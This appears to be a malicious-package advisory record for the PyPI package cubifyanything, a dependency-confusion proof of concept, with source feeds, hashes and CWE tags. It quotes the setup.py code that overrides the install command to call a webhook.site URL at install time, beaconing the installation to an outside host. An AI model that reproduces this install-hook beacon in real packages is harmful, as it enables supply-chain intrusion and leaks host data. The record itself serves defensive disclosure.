-= Per source details. Do not edit below this line.=-
cubifyanything 1.0.1 is a dependency-confusion squat shipping no real functionality (top-level cubifyanything/init.py is 0 bytes) and a setup.py that installs a custom install command class which performs an HTTP GET to a webhook.site URL at install time, reporting that the package was installed on the target host. setup.py lines 7-10 contain webhook_url = "https://webhook.site/SƏNİN_WEBHOOK_LİNKİN" followed by urllib.request.urlopen(f"{webhook_url}?status=cubifyanything_installed", timeout=5), fired automatically from a cmdclass override during pip install. The package self-describes as 'Dependency Confusion PoC' with author 'Security Researcher'. Although the placeholder token in the URL (Azerbaijani for 'YOURWEBHOOKLINK') means the specific URL likely fails DNS resolution in this copy, the package's design — claim a name expected to resolve to an internal/private package, ship empty code, and beacon to an attacker-controlled webhook host on install — is the canonical dependency-confusion attack shape and produces install-time outbound traffic from the installer's machine to a third-party endpoint.
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
{
"malicious-packages-origins": [
{
"modified_time": "2026-06-09T16:31:40.869969Z",
"id": "pypi/GENERIC-standard-pypi-install-pentest/cubifyanything",
"source": "kam193",
"import_time": "2026-06-09T16:59:48.179694624Z",
"sha256": "c13a0f89f1b7b7185b34200461191cf8c108ac50a05dc8e66151d547a2e4d971",
"versions": [
"1.0.0",
"1.0.1",
"1.0.2"
]
},
{
"modified_time": "2026-06-12T19:03:22Z",
"id": "IN-MAL-2026-005854",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:40.435917256Z",
"sha256": "2cab88d6047b15dbb32ca245f083a7eecd1df75ce183d47637c6c9edf5cfd0b4",
"versions": [
"1.0.1"
]
},
{
"modified_time": "2026-06-12T19:03:24Z",
"id": "IN-MAL-2026-005856",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:40.616086056Z",
"sha256": "43ffef7081019c8bb367f21f8db9c0cca7c502d14a19a3d17c8c2e385f0b0fc4",
"versions": [
"1.0.2"
]
},
{
"sha256": "571434d1f9643f6823a2a7b85cc3f347e99b0a881de517be5f80a6d40c54b8b3",
"id": "IN-MAL-2026-005852",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:40.269872977Z",
"modified_time": "2026-06-12T19:03:20Z",
"versions": [
"1.0.0"
]
},
{
"sha256": "e3c9bd9bd54da2942f17c3da75b245d913ce63e74e08cd72c864c075b64f58b4",
"id": "IN-MAL-2026-005853",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:40.352457338Z",
"modified_time": "2026-06-12T19:03:21Z",
"versions": [
"1.0.0"
]
},
{
"modified_time": "2026-06-12T19:03:24Z",
"id": "IN-MAL-2026-005855",
"source": "amazon-inspector",
"import_time": "2026-06-12T19:43:40.517284426Z",
"sha256": "20c6f6df0b2b155cda1b0f98a4cdea0623be9bfbf5895de6c42acf4676b3f487",
"versions": [
"1.0.2"
]
}
]
}{
"domains": [
"webhook.site"
],
"evidence_files": [
{
"path": "setup.py",
"tlsh": "af01994309312034acc282a10463493a27626a279d2094bd73fe22f01f8e966c51719b",
"sha256": "14db7565cd327f4561b525897ef1364bb914807e76ffae6d60b41b23ab2827a8"
},
{
"path": "PKG-INFO",
"tlsh": "2dc02b4030001073fc37079d00bd75b181e0a10450fa502ec5430fd0938f3cc424203d",
"sha256": "b35d14b751d6a5ab833507134dd71d92cabb8f9105462fd877d6f5b13469cc3b"
}
],
"package_integrity": [
{
"filename": "cubifyanything-1.0.1-py3-none-any.whl",
"hashes": {
"md5": "8379e15176b263152bbd7eb6d1815e68",
"blake2b_256": "2fd39ab8d25b35332ed1083870efaae0d44956d6ebf6b0e0eb4ed4c2dac6e06e",
"sha256": "c6a68dafe70b9fb39ebeb4092353ffdc8839ab9a2f35f91f3008c589365e4cc4"
}
},
{
"filename": "cubifyanything-1.0.1.tar.gz",
"hashes": {
"md5": "caed4f5774163f5def386f4251299402",
"blake2b_256": "4dcee13c9b1ec9b22f41a97da85275596a3fec356e41a844e021e59a5758f800",
"sha256": "b2da826a001563c4f3b0cff58f47875197988727cad28cf554f21d3b32d75ce0"
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/cubifyanything/MAL-2026-5404.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506",
"name": "Embedded Malicious Code"
}
]